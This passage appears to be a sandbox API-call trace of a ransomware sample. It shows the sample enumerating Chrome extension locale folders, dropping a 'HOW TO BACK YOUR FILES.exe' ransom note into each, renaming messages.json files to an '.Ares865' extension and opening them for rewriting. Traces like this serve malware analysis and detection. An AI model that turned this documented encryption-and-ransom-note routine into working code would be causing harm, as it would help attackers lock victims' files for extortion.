lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419" [0103.082] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419" [0103.082] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.082] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.083] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.083] GetLastError () returned 0x0 [0103.083] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e98d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4edee980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4edee980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.083] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.083] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.083] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.Ares865") returned 165 [0103.083] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.085] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=259) returned 1 [0103.092] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es" [0103.092] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es" [0103.092] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.092] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.093] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.093] GetLastError () returned 0x0 [0103.094] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e98d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee14ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee14ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.094] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.094] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.Ares865") returned 161 [0103.094] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.099] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=259) returned 1 [0103.101] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US" [0103.101] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US" [0103.101] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.101] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.102] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.102] GetLastError () returned 0x0 [0103.102] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e72c10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee14ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee14ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.103] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.103] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.103] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.Ares865") returned 164 [0103.103] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.105] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=249) returned 1 [0103.108] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB" [0103.108] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB" [0103.108] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.108] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.108] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.109] GetLastError () returned 0x0 [0103.109] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.109] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e72c10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee14ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee14ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.109] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.109] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.109] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.Ares865") returned 164 [0103.109] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.111] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=249) returned 1 [0103.114] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el" [0103.114] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el" [0103.114] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.114] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.115] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.115] GetLastError () returned 0x0 [0103.116] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.116] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e72c10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ee3ac40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ee3ac40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.116] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.116] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.116] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.Ares865") returned 161 [0103.116] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.118] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=329) returned 1 [0103.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de" [0103.121] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de" [0103.122] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.122] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW 